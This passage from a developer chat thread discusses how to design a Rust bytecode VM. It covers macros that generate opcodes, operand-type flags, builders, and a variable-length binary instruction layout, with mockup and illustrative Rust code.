        bottom: Jump,
    } => |next, cf| {
        if let Some(value) = next.iter().next() {
            value
        } else {
            cf.jump(next.bottom());
            Value::None
        }
    }

    #[flow]
    Jump {
        target: Jump,
    } => |jump, cf| {
        cf.jump(jump.target())
    }
    
    #[flow]
    Break {
        target: Jump,
    } => |break, cf| {
        // We want to go into breaking mode.
        cf.break(break.target())
    }
}

#

(obviously mockup code)

glad urchin Jan 24, 2024, 4:49 PM

#

sturdy sequoia ```rs isr! { Add -> Register | Local { lhs: Register | Constant | L...

Does that also define the instructions as types, or only implement traits?

sturdy sequoia Jan 24, 2024, 5:00 PM

#

glad urchin Does that also define the instructions as types, or only implement traits?

it would create a bunch of things actually

#

all of the opcodes (as a repr(u8) enum), all of the bitflags for the different types that each argument can take, etc.

#

and builder structs for every single instruction to make creation nicer
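To make the "generate the opcodes and the bitflags" part a bit more concrete, here is a much smaller declarative-macro sketch. It only produces a `repr(u8)` enum and one bitmask per argument; the `instructions!` macro, the flag constants, and `arg_masks` are invented for illustration and leave out outputs, builders, and the closures from the mockup.

```rust
/// Hypothetical bit flags for the kinds of operand an argument may be.
const REGISTER: u8 = 1 << 0;
const CONSTANT: u8 = 1 << 1;
const LOCAL: u8 = 1 << 2;

macro_rules! instructions {
    ($( $name:ident { $( $arg:ident : $( $kind:ident )|+ ),* $(,)? } )*) => {
        /// One opcode per declared instruction, numbered in declaration order.
        #[repr(u8)]
        #[derive(Debug, Clone, Copy, PartialEq)]
        enum Opcode { $( $name ),* }

        impl Opcode {
            /// One bitmask per argument, listing the operand kinds it accepts.
            fn arg_masks(self) -> &'static [u8] {
                match self {
                    $( Opcode::$name => &[ $( 0 $( | $kind )+ ),* ], )*
                }
            }
        }
    };
}

instructions! {
    Add { lhs: REGISTER | CONSTANT | LOCAL, rhs: REGISTER | CONSTANT | LOCAL }
    Not { value: REGISTER | LOCAL }
}

fn main() {
    assert_eq!(Opcode::Add as u8, 0);
    assert_eq!(Opcode::Not as u8, 1);
    assert_eq!(Opcode::Add.arg_masks().len(), 2);
    // `Not` does not accept a constant operand in this toy definition.
    assert!((Opcode::Not.arg_masks()[0] & CONSTANT) == 0);
}
```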

tight glade Jan 24, 2024, 5:01 PM

#

sturdy sequoia ```rs isr! { Add -> Register | Local { lhs: Register | Constant | L...

I have no idea what it means at all 😬😅
What does -> mean?

sturdy sequoia Jan 24, 2024, 5:01 PM

#

tight glade I have no idea what it means at all 😬😅 What does -> mean?

defines the output of the instruction

#

so Add produces either a Register or a Local

#

and then when the closure is called, it would produce a Value that would automatically be stored in the right place

tight glade Jan 24, 2024, 5:03 PM

#

Hmmm maybe i just don't have enough context to understand
But typically what is the right place

sturdy sequoia Jan 24, 2024, 5:03 PM

#

tight glade Hmmm maybe i just don't have enough context to understand But typically what is ...

It depends, it will either be stored in a register or stored in a local

#

my idea is that it can be done with the one instruction

tight glade Jan 24, 2024, 5:04 PM

#

But don't we need to know which register or local?

sturdy sequoia Jan 24, 2024, 5:06 PM

#

tight glade But don't we need to know which register or local?

exactly

#

that's the annoying part right now

#

with this it could be made much easier
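A sketch of the "stored in the right place" idea, assuming the destination carries both its kind and its index so that a single instruction can write to either a register or a local. `Readable`, `Writable`, and `Frame` are hypothetical names, and plain `i64` stands in for `Value`.

```rust
/// Where an operand is read from (only a subset of the kinds listed in the mockup).
#[derive(Debug, Clone, Copy)]
enum Readable {
    Register(u16),
    Local(u16),
    Constant(u16),
}

/// Where a result goes, mirroring `-> Register | Local`.
#[derive(Debug, Clone, Copy)]
enum Writable {
    Register(u16),
    Local(u16),
}

/// Toy execution frame holding the shared arrays the indices point into.
struct Frame {
    registers: Vec<i64>,
    locals: Vec<i64>,
    constants: Vec<i64>,
}

impl Frame {
    fn read(&self, src: Readable) -> i64 {
        match src {
            Readable::Register(i) => self.registers[i as usize],
            Readable::Local(i) => self.locals[i as usize],
            Readable::Constant(i) => self.constants[i as usize],
        }
    }

    /// The destination says which register or local receives the value.
    fn write(&mut self, dest: Writable, value: i64) {
        match dest {
            Writable::Register(i) => self.registers[i as usize] = value,
            Writable::Local(i) => self.locals[i as usize] = value,
        }
    }

    /// A single `Add` handles every operand and destination combination.
    fn add(&mut self, lhs: Readable, rhs: Readable, dest: Writable) {
        let value = self.read(lhs) + self.read(rhs);
        self.write(dest, value);
    }
}

fn main() {
    let mut frame = Frame { registers: vec![0; 2], locals: vec![10], constants: vec![5] };
    frame.add(Readable::Local(0), Readable::Constant(0), Writable::Register(1));
    assert_eq!(frame.registers[1], 15);
}
```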

#

I would also write it in a binary format with dynamic length instructions

tight glade Jan 24, 2024, 5:09 PM

#

I remain confused as to what happens precisely as a consequence of this macro invocation

I can only work with what i imagine is needed for your vm so I'd suggest choosing one of the simplest instructions and writing the non pseudo code version of the macro

sturdy sequoia Jan 24, 2024, 5:10 PM

#

It would produce:

tight glade Jan 24, 2024, 5:10 PM

#

Wouldn't dynamic length instructions complicate jumping a lot?

glad urchin Jan 24, 2024, 5:10 PM

#

sturdy sequoia all of the opcodes (as a `repr(u8)` enum), all of the bitflags for the different...

Wouldn't it be better to create the enum separately and have a macro to implement all of the auxiliary things?

sturdy sequoia Jan 24, 2024, 5:10 PM

#

- A builder for each instruction
- The Instruction enum
- The Compiler struct
- The Executor struct
- An accessor for each instruction
- The eval method on the executor

glad urchin Jan 24, 2024, 5:10 PM

#

Maybe even a derive macro

sturdy sequoia Jan 24, 2024, 5:10 PM

#

glad urchin Maybe even a derive macro

I want a single macro doing everything, specifically handling the dynamic length instructions

glad urchin Jan 24, 2024, 5:11 PM

#

Yeah well i don't

#

😎

#

lol jk

#

But I mean I just think it's weird to generate the types as well, idk

#

Unless it would be really hard to generate the types by hand

#

Somehow

tight glade Jan 24, 2024, 5:12 PM

#

sturdy sequoia - A builder for each instruction - The `Instruction` enum - The `Compiler` struc...

Nice! It does all the job 😂

Then to implement eval or bytecode for something you'd just return a list of instructions?

#

Well i see an interest in grouping all that logic, would the macro be comprehensible by mere mortals? 😁

sturdy sequoia Jan 24, 2024, 5:15 PM

#

tight glade Well i see an interest in grouping all that logic, would the macro be comprehens...

the macro would definitely be a mess 💀

tight glade Jan 24, 2024, 5:15 PM

#

😭😂

sturdy sequoia Jan 24, 2024, 5:16 PM

#

but it would make reading the VM code much much easier

tight glade Jan 24, 2024, 5:16 PM

#

Like how do you plan to handle dynamic length instructions?

sturdy sequoia Jan 24, 2024, 5:16 PM

#

tight glade Like how do you plan to handle dynamic length instructions?

based on each opcode it would know how many bytes to read

tight glade Jan 24, 2024, 5:17 PM

#

Sounds like you maybe need zero abstraction types to handle that complexity and then combine these lower-level bricks to build a system in which you can express the vm

sturdy sequoia Jan 24, 2024, 5:18 PM

#

it would look like:

| 8-bit  | 8-bit  |     16-bit     | 8-bit  |     16-bit     | 8-bit  |     16-bit     |
|--------|--------|----------------|--------|----------------|--------|----------------|
| OpCode | Flag   |      Arg0      | Flag   |      Arg1      | Flag   |      Dest      |

#

The flag would tell it what the argument is, so if it's a register, a const id, a local id, etc.
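A sketch of the layout above, assuming one opcode byte followed by a fixed number of (flag, 16-bit value) slots per opcode, with little-endian payloads. The flag values, `Opcode::slots`, and the `encode`/`decode` helpers are illustrative guesses. Jump targets are byte offsets here, so variable instruction lengths do not get in the way of jumping.

```rust
#[repr(u8)]
#[derive(Debug, Clone, Copy, PartialEq)]
enum Opcode {
    Add = 0,
    Jump = 1,
}

impl Opcode {
    fn from_byte(byte: u8) -> Option<Self> {
        match byte {
            0 => Some(Opcode::Add),
            1 => Some(Opcode::Jump),
            _ => None,
        }
    }

    /// Number of (flag, u16) slots after the opcode byte; this fixes the length.
    fn slots(self) -> usize {
        match self {
            Opcode::Add => 3,  // Arg0, Arg1, Dest
            Opcode::Jump => 1, // target
        }
    }
}

/// Hypothetical flag values saying how to interpret the 16-bit payload.
const REGISTER: u8 = 0;
const CONSTANT: u8 = 1;
const LOCAL: u8 = 2;
const JUMP: u8 = 3;

/// Appends one instruction to the byte stream.
fn encode(op: Opcode, slots: &[(u8, u16)], out: &mut Vec<u8>) {
    assert_eq!(slots.len(), op.slots());
    out.push(op as u8);
    for &(flag, value) in slots {
        out.push(flag);
        out.extend_from_slice(&value.to_le_bytes());
    }
}

/// Decodes the instruction at `pc`; also returns the offset of the next one.
fn decode(code: &[u8], pc: usize) -> Option<(Opcode, Vec<(u8, u16)>, usize)> {
    let op = Opcode::from_byte(*code.get(pc)?)?;
    let mut cursor = pc + 1;
    let mut slots = Vec::with_capacity(op.slots());
    for _ in 0..op.slots() {
        let raw = code.get(cursor..cursor + 3)?;
        slots.push((raw[0], u16::from_le_bytes([raw[1], raw[2]])));
        cursor += 3;
    }
    Some((op, slots, cursor))
}

fn main() {
    let mut code = Vec::new();
    encode(Opcode::Add, &[(REGISTER, 0), (CONSTANT, 5), (LOCAL, 1)], &mut code);
    encode(Opcode::Jump, &[(JUMP, 0)], &mut code); // jump back to byte offset 0
    let (op, _, next) = decode(&code, 0).unwrap();
    assert_eq!((op, next), (Opcode::Add, 10));
    let (op, slots, next) = decode(&code, next).unwrap();
    assert_eq!((op, slots[0], next), (Opcode::Jump, (JUMP, 0), 14));
}
```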

sturdy sequoia Jan 24, 2024, 5:18 PM

#

tight glade Sounds like you maybe need zero abstraction types to handle that complexity and ...

yes that's what I would do

tight glade Jan 24, 2024, 5:19 PM

#

That should reduce the need for a macro then right?

sturdy sequoia Jan 24, 2024, 5:19 PM

#

tight glade That should reduce the need for a macro then right?

Not really, because creating all of the builders etc. would be a giant chore

tight glade Jan 24, 2024, 5:20 PM

#

Maybe simpler macros here can help? 😅😇

#

Seems like we're moving the complexity around 😅

sturdy sequoia Jan 24, 2024, 5:21 PM

#

I mean I could do one macro per instruction and then a big macro that takes all of the other ones in

tight glade Jan 24, 2024, 5:21 PM

#

🤷‍♀️

sturdy sequoia Jan 24, 2024, 5:22 PM

#

like:

instruction! {
  struct Add -> Register | Local {
    lhs: Register | Constant | Local | Global | Param | Capture,
    rhs: Register | Constant | Local | Global | Param | Capture,
  }
}

tight glade Jan 24, 2024, 5:23 PM

#

That's like the same thing to be honest 😂

sturdy sequoia Jan 24, 2024, 5:23 PM

#

Then I can do something like:

impl Exec for Add<'_> {
  fn exec(self, cf: &mut ControlFlow) -> StrResult<...> {
    ops::add(self.lhs(), self.rhs())
  }
}

glad urchin Jan 24, 2024, 5:23 PM

#

I think you can still use macros, i just think you don't need to make everything a macro

tight glade Jan 24, 2024, 5:23 PM

#

Oh!

glad urchin Jan 24, 2024, 5:23 PM

#

sturdy sequoia Then I can do something like: ```rs impl Exec for Add<'_> { fn exec(self, cf: ...

E.g. this could be a derive macro

#

It would be much more readable too

tight glade Jan 24, 2024, 5:24 PM

#

sturdy sequoia Then I can do something like: ```rs impl Exec for Add<'_> { fn exec(self, cf: ...

That does sound nice

sturdy sequoia Jan 24, 2024, 5:25 PM

#

glad urchin E.g. this could be a derive macro

no, because I can't do custom syntax for the multiple input types and I can't easily specify the output type

glad urchin Jan 24, 2024, 5:27 PM

#

Huh?

sturdy sequoia Jan 24, 2024, 5:27 PM

#

glad urchin Huh?

I need to specify the multiple different types that an input can take

#

additionally, I also need to specify its output type

#

a derive macro cannot do that

#

an attribute macro could

glad urchin Jan 24, 2024, 5:28 PM

#

sturdy sequoia additionally, I also need to specify its output type

Where would this be used? In the field types?
